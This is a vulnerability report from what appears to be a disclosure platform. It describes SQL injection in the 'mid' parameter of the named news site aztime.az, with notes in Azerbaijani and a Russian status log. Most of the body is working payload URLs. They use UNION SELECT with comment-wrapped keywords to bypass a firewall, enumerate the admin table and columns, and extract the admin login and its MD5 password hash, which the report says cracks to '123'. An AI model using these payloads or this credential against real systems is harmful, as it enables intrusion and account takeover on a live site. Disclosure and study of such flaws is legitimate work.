mid Parametr Sql Injection

aztime.az 20 Июнь 2016, 03:50

Подробная информация

http://www.aztime.az/?id=3&bid=8&mid=676' # Sql Vunl
Column Sayi 13, Datalar gelen Columnlar 3,5,8
http://www.aztime.az/?id=3'&bid=8&mid=-676' UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--+-' # bele olanda ilk olarag table_name de problem yaranacag cunki latin1 convert etmek lazimdir onnan sonra 406 Not Accetpt xetasi gelecey firewalli bypass etmek ucunse
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(table_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema=database()*/--+-' # ekrana Admin table_name gelmelidir
Admin Table-den columnlari cekmek cun
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(column_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61646d696e*/ # lakin ekrana sadece ID column_name-si gelecey o biri column_name ler gelmiyecey
Login ve password olan column_name-ri tapmap ucun Like %log%(lakin %log% bu hisseni hex-lemek lazimdir ) ve Like %pas%(hemcinin %pas% buranida )
Emrinden istifade edib tapa bilerik
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(column_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61646d696e*/ and column_name like 0x2570617325--+-' # Loginler olan column_name "login"
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(column_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61646d696e*/ and column_name like 0x2570617325--+-' # Passwordlar olan column_name ise pass
Indi ise columlardan dalari cekek
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(login USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!admin*/ --+-' # Login admin
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(pass USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!admin*/ --+-' Password ise md5 olunmush halda: 202cb962ac59075b964b07152d234b70 (hash ise 123-dur)

Записи

  • 21 Октябрь 2016, 13:52
    Статус уязвимости
    Нет ответа от источника

  • 04 Октябрь 2016, 10:04
    Уязвимости присвоен балл
    За перевод уязвимости дано переводчику 8 баллов

  • 04 Октябрь 2016, 10:04
    Уязвимости присвоен балл
    За перевод уязвимости дано автору 0 баллов

  • 22 Август 2016, 10:11
    Статус уязвимости
    Отправлено сообщение об уязвимости на электронный адрес источника

  • 21 Июнь 2016, 13:47
    Уязвимости присвоен балл
    Модератор присвоил 8 баллов из 10-и на уязвимости

  • 21 Июнь 2016, 13:44
    Статус уязвимости
    Подтверждено со стороны модератора

  • 20 Июнь 2016, 03:50
    Добавлена уязвимость
    Добавлена уязвимость на BUGemot